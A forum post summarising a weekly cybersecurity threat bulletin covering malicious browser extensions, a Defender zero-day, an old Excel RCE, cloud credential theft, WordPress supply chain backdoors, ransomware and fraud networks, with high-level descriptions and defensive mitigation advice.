- This topic has 0 replies, 1 voice, and was last updated 2 weeks, 2 days ago by
.
Summary
A weekly cybersecurity threat bulletin highlights multiple active attacks, zero-days, supply chain compromises, ransomware campaigns, and large-scale fraud operations affecting enterprises, cloud environments, browsers, and end users.
The report covers:
• Active exploitation of legacy and new vulnerabilities
• Browser-based malware campaigns (Chrome extensions)
• Cloud and identity theft targeting major providers
• Supply chain attacks affecting widely used software
• Ransomware and phishing campaigns across regionsKey Threats Overview
This week’s major themes include:
• Browser extensions used as stealth backdoors
• Zero-day exploits affecting Microsoft Defender and Windows
• Legacy vulnerabilities (17-year-old Excel RCE) still under active exploitation
• Cloud credential theft targeting AWS, Azure, and GCP
• Supply chain attacks via WordPress plugins
• Large-scale fraud and malware distribution networks
• Increased brute-force attacks against edge devicesTechnical Details
1. Browser Extension Backdoor Campaigns• Malicious Chrome extensions detected in coordinated campaigns
• Designed for:OAuth2 token theft (Google accounts)
Telegram session hijacking
Ad injection (YouTube, TikTok)
Full-page script execution
Data exfiltration via C2 servers• Common behavior:
Runs silently in background scripts
Opens attacker-controlled URLs on browser startup
Uses shared command-and-control infrastructure
2. Microsoft Defender Zero-Day (RedSun)• Privilege escalation vulnerability affecting Windows 10/11 and Server
• Enables escalation from standard user → SYSTEM
• Requires Microsoft Defender to be enabled
• Reported as highly reliable and actively weaponizable3. Legacy Microsoft Excel RCE (CVE-2009-0238)
• 17-year-old vulnerability re-added to CISA KEV list
• Triggered by specially crafted Excel files
• Leads to full remote code execution if opened by user
• Still actively exploited in modern environments4. Cloud Credential Stealer (APT41)
• Linux ELF backdoor targeting:
AWS
Microsoft Azure
Google Cloud
Alibaba Cloud• Uses SMTP port 25 as covert C2 channel
• Harvests credentials and cloud metadata
• Includes stealth handshake validation to evade scanning tools5. WordPress Supply Chain Attack
• Plugin vendor compromised after acquisition
• Backdoor injected into plugins used by ~180,000 websites
• Features:Hidden PHP payload injection
C2-driven spam/redirect delivery
Cloaked behavior targeting Googlebot only
Ethereum-based domain resolution for resilience
6. Fake Mobile App Financial Theft• Fake Ledger app distributed via Apple App Store
• Resulted in ~$9.5M stolen from crypto users
• Attack method:Seed phrase harvesting
Direct wallet takeover
• Additional malicious app collected sensitive biometric and personal data
7. Ransomware & Malware CampaignsJanaWare Ransomware (Turkey-targeted):
• Delivered via phishing emails + Google Drive links
• Executes malicious JAR files via javaw.exe
• Uses geofencing for Turkish victims only
• Low-value ransom ($200–$400), high-volume targetingSmokedHam → Qilin ransomware chain:
• Delivered via malvertising
• Uses legitimate remote tools for persistence
• Leads to credential theft and lateral movement8. Edge Device Brute-Force Attacks
• Surge in attacks against:
SonicWall
FortiGate• 88% of activity traced to Middle East sources
• Focus on weak credentials and exposed interfaces
• High reconnaissance activity across enterprise perimeter devices9. Fraud & Underground Ecosystems
Triad Nexus Fraud Network:
• Uses front companies and cloud laundering
• Creates fake enterprise-grade phishing sites
• Responsible for ~$200M+ in losses
• Expanding globally across multiple regionsXinbi Guarantee Marketplace:
• Telegram-based illicit marketplace
• Over $21B in transaction volume
• Provides laundering, scam support, and illegal goods10. WordPress Plugin Backdoor (Essential Plugin)
• Supply chain compromise via plugin acquisition
• Injects hidden PHP backdoor into sites
• Uses:C2-controlled spam injection
Googlebot cloaking
Smart contract-based domain resolution
Observed Attack Lifecycle
Initial Access• Phishing emails
• Malicious browser extensions
• Supply chain compromises
• Malvertising campaignsExecution
• Payloads executed via scripts, JAR files, or browser processes
• Exploitation of user trust and legitimate softwarePersistence
• Browser startup backdoors
• Cloud credential access
• Embedded WordPress PHP payloadsCommand & Control
• Shared C2 infrastructure
• SMTP tunneling (cloud attacks)
• Domain rotation via blockchain mechanismsThreat Actor Landscape
Attribution includes:
• APT41 (China-linked cloud targeting)
• UNC1069 (North Korea-linked social engineering)
• Multiple ransomware affiliates (Qilin, DarkSide ecosystem overlap)
• Unknown coordinated browser extension operators
• Supply chain attackers targeting WordPress ecosystemImpact
This threat landscape demonstrates:
• Increased abuse of trusted platforms (Chrome, Apple App Store, WordPress)
• Persistent exploitation of legacy vulnerabilities
• Growing focus on cloud identity theft and session hijacking
• Browser-based attacks becoming a primary entry point
• Supply chain compromise as a dominant enterprise riskRisks to organizations:
• Credential theft (Google, Telegram, cloud accounts)
• Persistent browser-level backdoors
• Cloud workload compromise
• Data exfiltration via legitimate tools
• Large-scale ransomware exposureMitigation
Recommended defensive actions:
• Enforce strict browser extension policies
• Monitor OAuth token usage and anomalies
• Patch legacy vulnerabilities (especially Office and Defender-related CVEs)
• Restrict cloud API credentials and rotate keys regularly
• Block unauthorized JAR and script execution
• Harden perimeter devices (SonicWall, FortiGate)
• Audit WordPress plugins and supply chain dependencies
• Use MFA across all critical accounts
• Monitor C2 indicators and unusual outbound trafficReference:
• https://thehackernews.com/2026/04/threatsday-bulletin-17-year-old-excel.html
- You must be logged in to reply to this topic.